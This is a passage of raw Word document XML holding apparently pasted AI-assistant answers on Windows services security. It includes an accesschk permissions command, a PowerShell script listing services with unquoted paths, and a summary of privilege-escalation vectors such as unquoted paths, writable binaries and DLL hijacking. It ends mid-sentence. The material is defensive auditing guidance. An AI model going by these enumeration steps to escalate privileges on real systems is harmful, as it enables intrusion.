      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>accesschk.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> "C:\Path\To\ServiceExecutable.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3BEBB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerSploit’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7909BD" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Automates detection of common Windows privilege escalation vectors, including unquoted service paths and writable service binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D777086" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Service Security Scanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24AEDA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Custom scripts or open-source tools that audit services for common misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54C9CB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="77A9D8A8">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE6078" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example PowerShell Script to Find Risky Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0757887B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t># Find services with unquoted executable paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B8297" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>$services = Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> win32_service | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6DC5A0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443851D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -match '\s' -and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5651EC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>notmatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> '^</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>".*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>"$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391A0E6" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D69369" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">$services | Select-Object Name, DisplayName, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>StartName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16E206A7" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="49E9A7A2">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825F088" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">If you want, I can help you write more advanced scripts or walk you through using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> for deeper service security auditing. Want to go further?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE15BE" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F4BBEC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350C8516" w14:textId="2F794A82" w:rsidR="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="46192916" w14:textId="77777777" w:rsidR="002517B7" w:rsidRDefault="002517B7" w:rsidP="005F49FC"/>
    <w:p w14:paraId="09E1BB4E" w14:textId="77777777" w:rsidR="002517B7" w:rsidRPr="005F49FC" w:rsidRDefault="002517B7" w:rsidP="005F49FC"/>
    <w:p w14:paraId="3C5A62AD" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Would you like me to summarize the other parts you mentioned—functions of Windows services, workflow, or attack vectors—next?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51261A37" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204EDDCC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1156A5CC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Perfect! Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>summary and correction</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> covering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44235036" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Functions of Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8FDF0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Workflow of Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC29D41" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common security risks and attack vectors related to services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17A1E1" w14:textId="7BB44C79" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="74A9F15A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Functions of Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D07E0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Services</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> are long-running background processes that do not require user interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143F1B8" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>They provide essential functions such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CF569" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Managing hardware (e.g., drivers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FA79E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Running network protocols (e.g., HTTP, DHCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E3681" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Supporting applications (e.g., database engines, antivirus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8DF876" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Performing scheduled tasks or monitoring system events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A819B9D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Services can run under different accounts and with different privilege levels depending on their function and security requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B9A39" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="58D42DA9">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E983B6B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Workflow of Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C7958" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registration:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> When installed, a service is registered in the system registry with its configuration: executable path, account, start mode, dependencies, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02382061" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SCM):</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> The SCM is a core Windows component that manages all services — it starts, stops, pauses, and resumes them as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EE2EF" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Start:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> SCM launches the service executable under the configured account, initializes it, and puts it into a running state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94BF6D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operation:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> The service performs its designated functions silently in the background, reporting status to SCM and responding to control commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E805F7D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service Stop/Restart:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> SCM can stop or restart services gracefully or forcefully, freeing resources and managing dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBFC4D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="5EE8A1F5">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AF129" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Security Risks and Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B28DE9" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Misconfiguration:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Services running with excessive privileges (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>) can be leveraged by attackers to gain full system control if compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAD938" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unquoted Service Path Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> If the service binary path contains spaces and is not quoted, attackers can hijack the path to execute malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C0E50" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak File or Registry Permissions:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Writable service executables or registry entries allow attackers to replace binaries or modify configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DEC28" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL Hijacking:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Services loading DLLs without specifying full paths can be tricked into loading malicious DLLs placed by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E096CE2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Dependencies Abuse:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Attackers can alter or replace dependent services to influence </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> or escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2F657" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="1D9A0D9F">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D14917" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDB6E5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Windows Services play a vital role in system operation and security. Their workflow—from registration to execution—is managed by the SCM, and their privileges depend heavily on the accounts they run under. Improper configurations, especially regarding permissions and service accounts, are common attack vectors leading to privilege escalation and code execution. Following least privilege principles, securing service binaries and paths, and monitoring service configurations are key to maintaining a secure Windows environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E4A3A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="3A094987">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C28783" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Want me to help create a checklist or detailed commands/scripts for auditing Windows Services security?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB1719" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB7A471" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F8F798" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Sure! Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected and concise summary</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> of your section on </w:t>
      </w:r>
